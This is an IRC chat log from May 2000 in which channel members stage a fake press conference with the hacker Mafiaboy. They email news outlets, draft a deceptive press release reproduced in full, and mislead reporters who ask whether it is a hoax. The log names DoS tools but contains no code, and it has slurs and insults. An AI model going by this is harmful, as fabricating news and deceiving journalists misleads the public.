[16:04] <MrEreet> don't forget to take flood protection off and scroll the TEXT SOURCE TO DeCSS in the channel.
[16:05] <MrEreet> fed #1
[16:05] <MrEreet> [16:03] <Nikkitaal> btw: talking with me is like talking directly to goverment ;-)
[16:05] <MrEreet> [16:03] * Nikkitaal *waves* on cybercops watching him
[16:05] <MrEreet> already id'd as hoax
[16:05] <MrEreet> anyone know him
<snip>
[16:13] <SLiPY> heh
[16:13] <SLiPY> this is gonna be so much fun
[16:13] <SLiPY> and for fuck sakes
[16:13] <SLiPY> lets try to make this professional
[16:13] <Amoeba> how is it a hoax?
[16:13] <Amoeba> because mafiaboy won't really be here?
[16:13] <SLiPY> Bob,
[16:13] <SLiPY> Thanks for the note. I'm sure you understand my reservations. Is
[16:13] <SLiPY> there any way you can convince me this will be authentic?
[16:13] <SLiPY> Bob
[16:13] <SLiPY> hahaha
[16:13] <SLiPY> MSNBC
[16:13] <Amoeba> tell him that you are looking at him right now
[16:13] <Amoeba> no, nevermind
[16:13] <Amoeba> where would they be?
[16:14] <SLiPY> the feds?
[16:14] <SLiPY> bah
[16:14] <SLiPY> they can suck my dick
[16:14] <MrEreet> he is NASA security
[16:14] <SLiPY> i been raided already
[16:14] <MrEreet> <allegedly>
[16:15] <Amoeba> Slipy, they raided you?
[16:15] <SLiPY> yes
[16:15] <SLiPY> rcmp did
[16:15] <Amoeba> why?
[16:15] <Amoeba> who or what is rcmp?
[16:15] *** SugarKing sets mode: +oo MrEreet SLiPY
[16:15] <MrEreet> royal canadian mounted police
[16:15] <Amoeba> oh
[16:15] <Amoeba> I'm not in canada
[16:15] <SugarKing> heh
[16:15] <SugarKing> we can tell
[16:15] <SugarKing> alright
[16:15] <SugarKing> bbiab
[16:16] <Amoeba> how would the be, ey?
[16:16] <Amoeba> the=that
[16:16] *** flatline` has quit IRC (Ping timeout: 240 seconds)
[16:16] <SugarKing> haha
[16:16] *** SugarKing has quit IRC (Leaving)
[16:16] <Debris> whats hwa's url
[16:16] <Amoeba> www.g-t-online.com
[16:16] <SLiPY> man
[16:16] <SLiPY> they emailed me back
[16:16] <SLiPY> saying they will be here
[16:17] <MrEreet> http://welcome.to/HWA.hax0r.news
[16:17] <SLiPY> hehehehehehheejh
[16:17] <MrEreet> who?
[16:17] *** SLiPY is now known as YPiLS
[16:17] <MrEreet> can i have ops in chan plz
[16:17] *** MrEreet is now known as Optik-
[16:17] <YPiLS> MSNBC
[16:17] <Optik-> cool
[16:17] *** Optik- is now known as MrEreet
[16:18] <MrEreet> don't forget to take flood protection off and scroll the TEXT SOURCE TO DeCSS in the channel.
[16:18] <YPiLS> we need to talk about
[16:18] <YPiLS> our future plans
[16:19] <YPiLS> and start a group
[16:19] <YPiLS> make it all up
[16:19] <YPiLS> but once we get a conf goin
[16:19] <YPiLS> we'll call mafia
[16:20] <Amoeba> what do you mean conference?
[16:20] <Amoeba> and I thought someone is going to act like amfia
[16:20] <Amoeba> mafia
[16:20] <YPiLS> oh we are
[16:20] <YPiLS> but we wanna talk to the real mafia
[16:20] <Amoeba> oh
[16:21] <Amoeba> I never talked to him
[16:21] <Amoeba> how old is he?
[16:21] <Amoeba> 15?
[16:21] <YPiLS> 15
[16:21] <YPiLS> heh
[16:21] <YPiLS> will be mad fun
[16:21] <Amoeba> me too
[16:21] <Amoeba> I like to think of myself as 16
[16:21] <YPiLS> we emailed
[16:21] <YPiLS> over 30 agencyes
[16:21] <YPiLS> msnbc has confirmed they will be here
[16:22] <YPiLS> opps
[16:22] <Amoeba> I never got a mail with your mail, so I can send it to more places
[16:22] <YPiLS> whats address
[16:22] <Amoeba> msnbc???
[16:22] <YPiLS> i think 1 email fucked up
[16:22] <YPiLS> and said it couldn't be sent
[16:22] <Amoeba> get cnbc
[16:22] <Amoeba> I_am_the_real_gto@yahoo.com
[16:22] <Amoeba> what about ZDTV and ZDNET
[16:23] <YPiLS> emailed
[16:23] <YPiLS> but not replied
[16:23] <Amoeba> ok
[16:23] <Amoeba> ?
[16:23] <Amoeba> oh
[16:23] <Debris> this press release is rulling
[16:23] <Amoeba> what about wired news?
[16:23] <Debris> dude
[16:23] <Debris> you dont neeed that many
[16:23] <Amoeba> I hate to see what you do when you are more bored
[16:23] <Debris> all the online ones pick it up off of the wire
[16:23] <YPiLS> wired = emailed
[16:23] <YPiLS> zdnn replyed saying they got the tip
[16:24] <Amoeba> lol
[16:25] <Amoeba> so, can I have a part in this charade?
[16:25] <YPiLS> sure
[16:25] <YPiLS> we will introduce
[16:25] <YPiLS> the new group
[16:25] <YPiLS> heh
[16:25] <Amoeba> what kind of group?
[16:25] <YPiLS> and talk about our plans of chaos and deadly destruction
[16:25] <YPiLS> terrorisy
[16:25] <YPiLS> terrorist
[16:25] <Amoeba> brb
[16:25] <YPiLS> heh
[16:25] <YPiLS> we need to make this be good
[16:25] <Amoeba> gonna change my e-mail address so I don't get in trouble
[16:25] *** Amoeba has quit IRC (ircN 7.24 + 7.0 for mIRC (2000/03/17 22.00))
[16:25] <MrEreet> people bored yet?
[16:25] <MrEreet> heh
[16:26] <YPiLS> Thank you for sending your news tip to Wired News. We always welcome leads
[16:26] <YPiLS> that make our news informative and interesting. A reporter or editor may
[16:26] <YPiLS> follow up on this message with a request for more information.
[16:26] <YPiLS> fuck no
[16:26] <YPiLS> are u cruc?
[16:27] *** Amoeba (GTO@dialup-*.net) has joined #media-admin
[16:27] <k-rad-bob> what time is it right now in EST?
[16:27] <MrEreet> thinking
[16:27] <twilight-> Fri May 19 16:35:22 2000
[16:27] <MrEreet> might have blown it
[16:27] <Amoeba> back
[16:27] <twilight-> est
[16:27] <Amoeba> 4:37 est
[16:27] <Amoeba> Cruci, how?
[16:27] <YPiLS> this starts tommorow nite
[16:27] <YPiLS> 9pm EST
[16:28] <YPiLS> we haven't blown it, we just need to keep quite, either way its gonne be funny
[16:28] <MrEreet> if Nikitaal really is government then its blown
[16:28] <MrEreet> [16:03] <Nikkitaal> btw: talking with me is like talking directly to goverment ;-)
[16:28] <MrEreet> [16:03] * Nikkitaal *waves* on cybercops watching him
[16:28] <Amoeba> yeah, he said it's a hoax
[16:28] <MrEreet> hes in my channel
[16:28] <YPiLS> -> [msg(Nikkitaal)] hey
[16:28] <YPiLS> -> [msg(Nikkitaal)] cybercop, suck my dick.
[16:28] <YPiLS> heh
[16:28] <YPiLS> man
[16:28] <MrEreet> he knew details on {}'s bust
[16:28] <YPiLS> cyber cops can't do shit
[16:28] <MrEreet> and {} left
[16:28] <YPiLS> well they can but oh well who cares
[16:29] <MrEreet> also think those splits were accidental?
[16:29] <MrEreet> they just installed sniffers
[16:29] <YPiLS> heheheheheheeh
[16:29] <MrEreet> no shit
[16:29] <Amoeba> {} and him talked like they knew each other
[16:29] <MrEreet> they did
[16:29] <MrEreet> hes a fed agent
[16:30] <Amoeba> {} said something about that guy being on his box and {} had to help him
[16:30] <YPiLS> guys
[16:30] <YPiLS> we aren't doing anything illegal
[16:30] <YPiLS> chill
[16:30] <MrEreet> I know
[16:30] <MrEreet> hehe
[16:30] <YPiLS> long as no one starts packetting cnn.com heh we're fine
[16:30] <YPiLS> just don't worry
[16:31] <Amoeba> isn't it a federal offense to run a hoax on the media, or something like that
[16:31] <YPiLS> no
[16:31] <YPiLS> not likely
[16:31] <YPiLS> its not like we're phonin 911
[16:31] <YPiLS> with fake shit
[16:32] <Amoeba> yeah, and I have nothing to do with this
[16:32] <YPiLS> heh man
[16:32] <YPiLS> yer parnoid
[16:32] <YPiLS> i been raided and told to not even talk to my irc friends
[16:32] <YPiLS> i laughed
[16:32] <YPiLS> heh
[16:33] <Amoeba> well I can't get in trouble with the law
[16:33] <Amoeba> it would ruin my SAT scores
[16:33] <YPiLS> neither can i
[16:33] <YPiLS> if i was worried about this shit
[16:33] <YPiLS> i wouldn't do it
[16:33] <YPiLS> if i get caught doin anything illegal with computers i go straight to jail
[16:34] <YPiLS> <YPiLS> hello
[16:34] <YPiLS> <typo_> im from tivision (www.tiv.at), austrian tv channel
[16:34] <YPiLS> here we go.
[16:34] <Amoeba> lol
[16:34] <MrEreet> k so maybe he's just a pretend fed
[16:34] <MrEreet> hahaha
[16:34] <MrEreet> don't know don't care
[16:35] <Amoeba> I'm starving
[16:35] <YPiLS> <typo_> we are nonprofit.. so what are you doing here?
[16:35] <YPiLS> <YPiLS> gonna write yer name down on paper to make sure you get yer chance tommorow night to speak to him.
[16:35] <YPiLS> <typo_> (need more info, maybe we can get it into our IT section on tuesday)
[16:35] <YPiLS> <typo_> yeah.. but what exactly will happen? just questions for mafiaboy ?
[16:35] <YPiLS> <YPiLS> well mafiaboy feels its important that the world knows what he did, he isn't really a bad person like the media is saying, they are saying he's a evil hacker and everything, when really
[16:36] <YPiLS> <typo_> ok cool
[16:36] <YPiLS> <YPiLS> he just feels its important to get the facts straight
[16:36] <YPiLS> heh
[16:36] <YPiLS> this is gonna be funny
[16:36] <YPiLS> <typo_> i'll call the guy that is responsible for TIV IT
[16:36] <Amoeba> lol
[16:36] *** fraggy (fraggy@*.home.com) has joined #media-admin
[16:38] *** fraggy has quit IRC (la de da)
[16:39] <Amoeba> Slipy, I got 2 mails from you at the same time
[16:39] <YPiLS> heh
[16:39] <Amoeba> Should I send it to people?
[16:40] <Amoeba> Because you may have already done that
[16:40] <Amoeba> Alot of places will just get it from wired news
[16:40] <Amoeba> and wired news gets it from the people themselves
[16:48] *** k-rad-bob has quit IRC (Ping timeout)
[16:50] <YPiLS> yeah
[16:50] <YPiLS> go for it
[16:50] <YPiLS> spread the word
[16:50] <YPiLS> just be professional
[16:50] <YPiLS> no
[16:51] <YPiLS> heh mafiaboy be online tonite
[16:51] <YPiLS> leete shit goin on
[16:51] <YPiLS> heh
[16:53] *** Debris has quit IRC (Read error 60: Operation timed out)
[16:54] <Amoeba> Slipy, what if you already mailed a person?
[16:54] <YPiLS> what do u mean?
[16:55] <Amoeba> like if you already contacted a media company
[16:55] <Amoeba> and then I contact them
[16:55] *** Debris (3223@*.net) has joined #media-admin
[16:56] *** MrEreet sets mode: +o Debris
[16:56] *** MrEreet sets mode: +o Amoeba
[16:56] <Amoeba> thank you
[16:56] <MrEreet> aye
[16:56] <Amoeba> what bout #HWA?
[16:57] <YPiLS> oh well
[16:57] <YPiLS> go for it
[16:58] <YPiLS> just keep it real
[16:58] <Amoeba> ok
[16:58] <YPiLS> tell no one even yer friends
[16:58] <YPiLS> its a hoax
[16:58] <Amoeba> I'll send them the mail you sent me
[16:58] <YPiLS> k
[16:58] <YPiLS> sounds good
[16:58] <MrEreet> need more drugs
[16:59] <MrEreet> -m the channel its too quiet
[16:59] <Amoeba> what about mtv?
[16:59] <MrEreet> I see no media
[16:59] <MrEreet> heh
[16:59] <Amoeba> truelife?
[16:59] <YPiLS> channel is +m
[16:59] <MrEreet> k
[16:59] <YPiLS> to keep the hoax quite
[16:59] <YPiLS> just deal wit it
[16:59] <YPiLS> heh
[16:59] <MrEreet> :-))
[16:59] <Amoeba> Cruci, I am getting a cable modem
[16:59] <YPiLS> tommorow nite we get organized better
[16:59] <Amoeba> tomorrow
[16:59] <MrEreet> cool
[16:59] <YPiLS> bbl going out
[16:59] <MrEreet> aight man
[16:59] <YPiLS> keep the media attention up
[16:59] <Amoeba> but it isn't static
[16:59] <YPiLS> but the hoax down.
[16:59] <MrEreet> werd
[17:00] * MrEreet snickers
[17:01] * Amoeba eats a Snickers
[17:01] <Amoeba> |��8
[17:02] *** debris- (3223@2*.uu.net) has joined #media-admin
[17:02] *** MrEreet sets mode: +o Debris
[17:04] <YPiLS> bbl
[17:04] <debris-> op me in thre other one
[17:04] <debris-> the press release is done
[17:05] <Amoeba> debris, can I see
[17:05] <debris-> im uploading it
[17:05] <debris-> wait
[17:05] <MrEreet> is that you too?
[17:05] <MrEreet> Debris is 3223@*.popsite.net * HEH?
[17:05] <MrEreet> or an imposter
[17:05] <debris-> free isp
[17:05] *** Debris has quit IRC (Read error 54: Connection reset by peer)
[17:06] *** MrEreet sets mode: +o debris-
[17:06] <debris-> dont talk in media-event
[17:07] <debris-> yo
[17:07] <debris-> i think z28 should play mafiaboy
[17:07] <MrEreet> can i chant "hoax" ?
[17:07] <debris-> i think z28 should play mafiaboy
[17:07] <debris-> i think z28 should play mafiaboy
[17:07] <debris-> i think z28 should play mafiaboy
[17:07] <MrEreet> u know
[17:07] <MrEreet> i really don't care
[17:07] <MrEreet> :)
[17:07] <MrEreet> we gonna hold auditions now?
[17:07] <MrEreet> heh
[17:07] <debris-> dude
[17:07] <debris-> trust me
[17:08] <debris-> z28 is the best at this
[17:08] *** debris- changes topic to 'press release www1.thevortex.com'
[17:08] <MrEreet> oh i know I just don't want a fight to fuck it up
[17:08] <MrEreet> ask YPiLS he's mafiaboy
[17:08] <MrEreet> haha
[17:08] <MrEreet> i'm just watching now
[17:08] <MrEreet> already caused enuff shit
[17:09] <debris-> read the press release
[17:10] <MrEreet> heh
[17:10] <MrEreet> don't really want hwa involved
[17:10] <Amoeba> The channel will be moderated thus meaning, now questions will be directly posed to Mafiaboy.
[17:10] <debris-> ok z28 isnt doing it
[17:10] <Amoeba> now should be no
[17:10] <debris-> oh shit
[17:10] <YPiLS> yeah
[17:10] <YPiLS> b4 i go out
[17:10] <YPiLS> any chance
[17:11] <YPiLS> someone on a .montreal isp
[17:11] <YPiLS> could
[17:11] <YPiLS> pose?
[17:11] <YPiLS> debris i'm lookin yer way
[17:11] <YPiLS> ;)
[17:11] <MrEreet> already thought of that but wasn't saying anything
[17:11] <debris-> heh
[17:11] <debris-> we'll see
[17:11] <YPiLS> well i gotta jet
[17:11] <YPiLS> i'll talk more tonite
[17:11] <YPiLS> and try to get a conf up
[17:11] <MrEreet> have fun
[17:11] <YPiLS> with REAL mafiaboy
[17:11] <YPiLS> bbl
[17:11] <MrEreet> think anyone cares?
[17:12] <Amoeba> lol
[17:12] <MrEreet> io think the impending possibility of a retaliatory mass attack was more scary
[17:12] <Amoeba> the rules debris came up with say that any question the press would want to ask is not allowed
[17:12] <Amoeba> those are all the questions they ask
[17:12] <debris-> that makes it more legit
[17:12] <MrEreet> use gov-boi's site instead of hwa in the release
[17:12] <debris-> this isnt a fucking free for all
[17:12] <MrEreet> or something
[17:12] <debris-> we gotta act like were his godamn lawyers
[17:13] <Amoeba> ok
[17:13] <Amoeba> then get rid of the fucking black ass background
[17:13] *** debris- sets mode: -o+b Amoeba *!*GTO@*.l3.net
[17:13] *** Amoeba was kicked by debris- (death to you)
[17:13] <debris-> its not black
[17:13] <MrEreet> haha
[17:13] <YPiLS> don't ban him
[17:13] <YPiLS> he could spill the beans
[17:13] <YPiLS> in media-event
[17:14] <debris-> then ill ban him from media event
[17:14] <debris-> hes gay
[17:14] <debris-> <Amoeba> wtf was that?
[17:14] <debris-> <debris-> its not black
[17:14] <debris-> -Amoeba- Your message has been recorded, away for 10m45s (bored) [email:ntsecurity00@hotmail.com]
[17:14] <debris-> <Amoeba> yes it is
[17:14] <debris-> <debris-> no it isnt
[17:14] <debris-> <debris-> BGCOLOR="#00002b"
[17:14] <debris-> fucking retarded fool
[17:15] <debris-> <Amoeba> get rid of the background tag
[17:15] <debris-> <debris-> well then you must be color blind
[17:15] <debris-> <debris-> no
[17:15] <debris-> <debris-> its fine
[17:15] <debris-> <Amoeba> that might be screwing it up
[17:15] <debris-> <debris-> ive done this before
[17:15] <debris-> <Amoeba> I make webpages for a living
[17:15] <debris-> <Amoeba> and that was no fucking reason to ban me
[17:15] <debris-> <debris-> i create media hoaxes for a living
[17:15] *** debris- sets mode: -b *!*GTO@*.vel3.net
[17:15] *** Amoeba (GTO@dialup.net) has joined #media-admin
[17:15] *** debris- sets mode: +o Amoeba
[17:15] <MrEreet> werd
[17:16] <debris-> i chose that color scheme for a specific reason, to keep it uniform with g0at security and hwa
[17:16] <MrEreet> yeh but remove hwa
[17:16] <debris-> it looks like this is part of an organization now
[17:16] <debris-> remove hwa?
[17:16] <MrEreet> yeh
[17:16] <debris-> <Amoeba> now I am going to curse you, because you severly pissed me off
[17:16] <debris-> <Amoeba> just have to release some aggression
[17:16] <debris-> <Amoeba> you fucking piece of shit
[17:16] <debris-> <Amoeba> what the fuck do you think you're doing?
[17:16] <debris-> <Amoeba> you are the primortial ooze under my shoe
[17:16] *** debris- sets mode: -o+b Amoeba *!*GTO@*.Level3.net
[17:16] *** Amoeba was kicked by debris- (sigh)
[17:17] *** debris- sets mode: -b *!*GTO@*.Level3.net
[17:17] <debris-> you sure you want hwa out of it
[17:17] <MrEreet> yup
[17:17] <debris-> oki
<snip>
[17:47] <SugarKing> www1.thevortex.com
[17:47] <SugarKing> too good:)
<snip>
A website was used to post the details of the 'press release' and
this was posted in the channel topic...
Version #1
05/19/00 - Mafiaboy online press conference
http://www.goat-advisory.org g0at security in conjunction with hwa.hax0r.news
are pleased to announce a Q and A session with alleged hacker, Mafiaboy.
Welcome members of the press and all interested parties. Saturday, May 20 2000,
members of the press and the general public have the oppurtunity to query the
alleged hacker responsible for the attacks on yahoo.com.
The interview will begin promptly at 9:00pm EST on the given date on the Eris
FreeNet's IRC (Internet Relay Chat) network dubbed, EFnet (instructions on
connecting follow).
In order to connect to EFnet, please follow these easy steps
Visit http://www.mirc.com mIRC.com and download the latest version of the mIRC
internet relay chat client. http://home.vpi.net/~hawk/mirc571t.exe
Win95/98/00/NT http://home.vpi.net/~hawk/mirc571s.exe Win3.1/3.11
Upon completion of the download, execute the mIRC self-extracting file and
install it (it is extremely simple, just follow the instructions
Execute the mIRC client. After the splash page, a window should pop up with
empty fields. It is very important that you follow these instructions carefully
or you will not be admitted into the interview. The window you see, will be
labeled 'connect'. Where it is written 'full name', please proceed to input
your full name. In the 'e-mail' field, put you're real e-mail address. Under
'nickname', please put the abreviated name of the agency you represent.
In the 'alternative' field, please enter the same nickname you have entered,
followed by a '-'. Ex) Nickname: BNN | Alternative: BNN-.
Next, making sure the minus sign is visible beside the connect option
(if it is not, double click it), select the ident section (a sub-option of
connect). Select the inable ident server option on the right of your screen.
Under USER ID, enter the full name of the agency you represent. Click the ok
button at the bottom of your screen.
A blank screen should now be in front of you. At the bottom of this screen
there should be a text box. In this box type the following to connect to EFnet.
/server irc.idle.net and click enter. This should connect you to EFnet.
If this does not work, use one of the following alternatives to irc.idle.net:
irc.lsl.com, irc.nethead.com, irc.prison.net, irc.concentric.net, irc.freei.net,
irc.core.com.
A grey window will pop-up once you connect with a list of room names.
At the top, type #media-event and click the join button.
You are now connected.
The interview will engage as follows. The channel will be moderated thus meaning,
now questions will be directly posed to Mafiaboy. At the beginning of the interview,
the nickname of the thirdparty will be divulged. All questions should be asked
towards the third party. In order to do so, double click the third party's nickname
on the right side of the window and enter your question. Questions will be answered
on a first come first serve basis. We ask that you pose one question at a time to
give a chance to others.
The following is not to be asked and doing such will result in immediate expulsion
from the interview: names of accomplices, Mafiaboy's real name, technical questions
concerning the tools used and questions concerning the servers involved in the attacks.
We also ask that you only message the moderator. Messaging any other of the channel
operators including mafiaboy will result in expulsion from the interview. If we find
that you are not following one or more rules including the connecting rules, you will
be expelled.
- g0at security/hwa.hax0r.news
Version #2
05/19/00 - Mafiaboy online press conference
http://www.goat-advisory.org
g0at security is pleased to announce a Q and A session with alleged hacker,
Mafiaboy.
Welcome members of the press and all interested parties. Saturday, May 20
2000, members of the press and the general public have the oppurtunity to
query the alleged hacker responsible for the attacks on yahoo.com.
The interview will begin promptly at 9:00pm EST on the given date on the
Eris FreeNet's IRC (Internet Relay Chat) network dubbed, EFnet
(instructions on connecting follow).
In order to connect to EFnet, please follow these easy steps
Visit http://www.mirc.com mIRC.com and download the latest version of the
mIRC internet relay chat client. http://home.vpi.net/~hawk/mirc571t.exe
Win95/98/00/NT http://home.vpi.net/~hawk/mirc571s.exe Win3.1/3.11
Upon completion of the download, execute the mIRC self-extracting file and
install it (it is extremely simple, just follow the instructions
Execute the mIRC client. After the splash page, a window should pop up with
empty fields. It is very important that you follow these instructions
carefully or you will not be admitted into the interview. The window you
see, will be labeled 'connect'. Where it is written 'full name', please
proceed to input your full name. In the 'e-mail' field, put you're real
e-mail address. Under 'nickname', please put the abreviated name of the
agency you represent. In the 'alternative' field, please enter the same
nickname you have entered, followed by a '-'. Ex) Nickname: BNN
| Alternative: BNN-. Next, making sure the minus sign is visible beside
the connect option (if it is not, double click it), select the ident
section (a sub-option of connect). Select the inable ident server option
on the right of your screen. Under USER ID, enter the full name of the
agency you represent. Click the ok button at the bottom of your screen.
A blank screen should now be in front of you. At the bottom of this
screen there should be a text box. In this box type the following to
connect to EFnet. /server irc.idle.net and click enter. This
should connect you to EFnet. If this does not work, use one of the
following alternatives to irc.idle.net: irc.lsl.com, irc.nethead.com,
irc.prison.net, irc.concentric.net, irc.freei.net, irc.core.com.
A grey window will pop-up once you connect with a list of room names.
At the top, type #media-event and click the join button.
You are now connected.
The interview will engage as follows. The channel will be moderated
thus meaning, now questions will be directly posed to Mafiaboy. At
the beginning of the interview, the nickname of the thirdparty will
be divulged. All questions should be asked towards the third party.
In order to do so, double click the third party's nickname on the right
side of the window and enter your question. Questions will be answered
on a first come first serve basis. We ask that you pose one question at
a time to give a chance to others.
The following is not to be asked and doing such will result in immediate
expulsion from the interview: names of accomplices, Mafiaboy's real name,
technical questions concerning the tools used and questions concerning
the servers involved in the attacks.
We also ask that you only message the moderator. Messaging any other of
the channel operators including mafiaboy will result in expulsion from
the interview. If we find that you are not following one or more rules
including the connecting rules, you will be expelled.
- g0at security
[17:58] <MrEreet> flow with it
[17:58] <MrEreet> who all was contacted anyway?
[17:58] <MrEreet> the list i posted and who else?
[17:58] <SugarKing> i dunno
[18:00] <MrEreet> hehe
[18:00] <debris-> slipy better get back soon to give the url to the media
[18:01] <MrEreet> he said 30 agencys were notified
[18:01] <MrEreet> what was the reply email though?
[18:01] <MrEreet> we wont see responses until late tonight or tomorrow
[18:01] <debris-> he got one from msnbc and zdnet
[18:02] <MrEreet> and wired?
[18:02] <debris-> dunno
[18:02] <debris-> shit
[18:02] <debris-> we should contact the montrealgazette
[18:02] <MrEreet> i could contact them all again but i don't want to tarnish my rep if it blows up
[18:02] <MrEreet> heh
[18:03] <debris-> because their coverage of mafiaboy gets wired on southempress which owns all the news papers in canada
[18:05] <MrEreet> u know it really is a good opportunity for some underground propaganda and statements clearning up bs like ILOVEYOU virus and DeCSS issues from ppl in the scene
[18:05] <debris-> dude
[18:05] <debris-> keep it simple
[18:05] <MrEreet> well i'm resigned to that now
[18:05] <debris-> just keep it pure mafiaboy and it will make the news
[18:06] <debris-> then we will announce the hoax
[18:06] <MrEreet> yeh
[18:06] <debris-> like the next day
[18:06] <SugarKing> they're gonna be bullshit
[18:06] <SugarKing> heh
[18:06] <MrEreet> needs a twist tho
[18:06] <MrEreet> or at least a good message
[18:06] <debris-> just let them ask their questions, answer them intelligently and etc
[18:06] <MrEreet> not just a hoax for the sake of pulling it off
[18:06] <debris-> ill set up a goat-advisory.org bnc for mafiaboy
[18:06] <MrEreet> nod
[18:08] <MrEreet> biagb
[18:08] <MrEreet> -g
[18:09] <debris-> btw typo_ is media
[18:09] <MrEreet> this fucking sub wrap thing is messy as fuck
[18:09] <MrEreet> oh
[18:09] <MrEreet> shit
[18:09] <debris-> a .at tv show
[18:09] <MrEreet> oh good
[18:09] <MrEreet> not even english
[18:09] <MrEreet> now i'm gay
[18:09] <MrEreet> omg
[18:09] <MrEreet> OMG
[18:09] <MrEreet> rofl
[18:10] <debris-> heg
[18:10] <debris-> heh
[18:10] <MrEreet> [18:09] <p_> yo
[18:10] <MrEreet> [18:10] <p_> is this a hoax or not ?
[18:10] <debris-> ask who he is first
[18:10] *** debris- is now known as Debris
[18:12] <MrEreet> [18:10] <p_> btw I am patrick from security.nl
[18:12] <Debris> wtf is security.nl
[18:12] <MrEreet> [18:12] <p_> whom did you send the press release to ?
[18:13] <MrEreet> crap
[18:13] <SugarKing> security.nl?
[18:13] <Debris> fuck just tell him to message me ill shut him up
[18:14] <MrEreet> told him to msg ya
[18:15] <Debris> he's not messaging me
[18:15] <Debris> i must have started shit with him sometime in the past
[18:18] <MrEreet> guess he doesn't wanna talk to you
[18:18] <MrEreet> hrm
[18:20] <Debris> <p_> no more info needed at this time. tnx
[18:20] <Debris> <Debris> uh...
[18:22] <SugarKing> heh
[18:25] *** YPiLS has quit IRC (Ping timeout: no data for 251 seconds)
[18:26] *** i0 (i0@*.no) has joined #media-admin
[18:32] <i0> Anything new
[18:32] <MrEreet> chatting with the security dude
[18:32] <MrEreet> cool guy
[18:34] <i0> heh
[18:35] <i0> can't wait
[18:35] <twilight-> away back to resident evil (Off/l)(Off/p) (salman@*.com/e) (37543014/uin)
[18:49] * Debris is away, went out [log:OFF] [page:OFF]
[19:02] <SugarKing> [19:07] *** Joins: VetesGirl (Destiny@dyn1-tnt2-206.*.ameritech.net)
[19:02] <SugarKing> heh
[19:02] <SugarKing> hmm
[19:02] <SugarKing> left
[19:02] <MrEreet> some leet types have joined and split
[19:07] <i0> is there any shit in the news yet?
[19:07] <MrEreet> doubt it
[19:07] <MrEreet> real media will try to contact mafiaboy by phone and he will say he knows nothing about it.
[19:08] <MrEreet> thats my guess anyay
[19:08] <MrEreet> it will get mentioned tho
[19:08] <MrEreet> sentence or two somewhere
[19:14] <Amoeba> I just woke up
[19:25] <MrEreet> fucking unreal i can barely stand all this excitement
[19:26] <MrEreet> should I stir things up a bit or leave it alone?
[19:29] <SugarKing> leave it
[19:29] <SugarKing> you don't wanna hype it up that much
[19:37] <twilight-> returned (*yawn*) (1h2m50s)
[19:39] <MrEreet> but
[19:39] <MrEreet> I'm bored
[19:42] <twilight-> how'd you hype it more?
[19:45] <MrEreet> another thing that would generate media interest is to start discussion about it on various web message boards
[19:46] <MrEreet> if public shows interest media will pay more attention
[19:46] <MrEreet> so hit news sites and stuff
[19:48] <twilight-> maybe someone should post it to packetstorm and bugtraq?
[19:48] <twilight-> anti already got mail sent to i think
[19:48] <MrEreet> anyone have slashdot access?
[19:49] <twilight-> i forgot my pw on slash =\
[19:58] <MrEreet> heh
[19:58] <MrEreet> this is funny
[19:58] <twilight-> hrm.. in the ss.. which division do you suppose would handle an event like this?
[19:58] <twilight-> they mailed back?
[19:58] <MrEreet> yep
[19:59] <twilight-> heh, coolter there
[19:59] <twilight-> ah
[19:59] <twilight-> anyone else replied back yet?
[19:59] <MrEreet> no idea my email wasn't used
[19:59] <MrEreet> :(
[20:10] *** sku|| (seksi@dial*.freei.net) has joined #media-admin
[20:10] <sku||> werd
[20:18] <MrEreet> y0
[20:19] <SugarKing> hi
[20:19] <SugarKing> MrEreet: sku||.....is a whore
[20:19] <SugarKing> haha
[20:19] *** SugarKing sets mode: +v sku||
[20:19] <sku||> he knows
[20:23] *** YPiLS has quit IRC (Ping timeout: no data for 247 seconds)
[20:27] <Amoeba> back
[20:34] *** Amoeba has quit IRC (Ping timeout)
[20:36] *** Amoeba (GTO@dialup-*.Level3.net) has joined #media-admin
[20:41] <MrEreet> -=-
[20:41] <MrEreet> 20:33] <xzrg> hope you know.
[20:41] <MrEreet> [20:33] <xzrg> you arent interviewing the 'real' mafiaboy
[20:41] <MrEreet> [20:33] <MrEreet> how do you know this?
[20:41] <MrEreet> [20:33] <xzrg> because i fucking KNOW MAFIABOY.
[20:41] <MrEreet> -
[20:41] <MrEreet> [20:34] <MrEreet> will he talk on phone?
[20:41] <MrEreet> [20:35] <xzrg> you wont get to talk with him AT ALL
[20:41] <MrEreet> [20:35] <MrEreet> fine fuck off then.
[20:41] <MrEreet> -
[20:42] <MrEreet> <MrEreet> don;t need attitude
[20:42] <MrEreet> [20:35] <MrEreet> IGNORED
[20:42] <MrEreet> [20:35] <xzrg> i'm not giving you an attitude
[20:42] <MrEreet> [20:35] <xzrg> i'm just emphasizing those words.
[20:42] <MrEreet> [20:35] <MrEreet> frankly i don't even care
[20:42] <MrEreet> [20:35] <xzrg> i'm just letting you know
[20:42] <MrEreet> [20:35] <MrEreet> thanks
[20:42] <MrEreet> -
[20:42] <MrEreet> 20:36] <xzrg> you wont be getting an interview.
[20:42] <MrEreet> [20:36] <xzrg> well yeah sure you will
[20:42] <MrEreet> [20:36] <xzrg> but it wont be with 'mafiaboy'
[20:42] <MrEreet> [20:36] <MrEreet> believe me I have enough info in my zine already
[20:42] <MrEreet> [20:36] <MrEreet> i could care less personally
[20:42] <MrEreet> [20:36] <MrEreet> he has no skill
[20:42] <MrEreet> [20:36] <xzrg> enough info in your zine?
[20:42] <MrEreet> [20:36] <MrEreet> no concern of mine
[20:42] <MrEreet> -
[20:42] <MrEreet> [20:38] <xzrg> ok.. who is the person incharse?
[20:42] <MrEreet> [20:38] <xzrg> incharge
[20:42] <MrEreet> [20:38] <MrEreet> debris
[20:42] <MrEreet> [20:39] <MrEreet> check the "press release" in the channel topic
[20:43] <MrEreet> -
[20:44] <MrEreet> xzrg is ~regg@*.monmouth.com * americunt hair pie
[20:44] <MrEreet> xzrg on #media-event @#shellz #shells
[20:44] <MrEreet> xzrg using irc.concentric.net Concentric Network Corporation
[20:44] <MrEreet> xzrg has been idle 7 secs, signed on Fri May 19 14:52:11
[20:44] <MrEreet> -
[20:51] <MrEreet> hahaha
[20:51] <MrEreet> guess who that is
[20:52] <Amoeba> who?
[20:52] <MrEreet> it IS mafiaboy's friend
[20:52] <Amoeba> lol
[20:52] <MrEreet> he was dossing as well
[20:52] <MrEreet> but didn't get caught
[20:52] <Amoeba> so, is he gonna keep the secret?
[20:52] <Amoeba> he was?
[20:52] <MrEreet> yeh
[20:52] <MrEreet> ya
[20:52] <Amoeba> what program did they use?
[20:52] <Amoeba> zombies?
[20:52] <MrEreet> tfn
[20:53] <Amoeba> tribal flood network
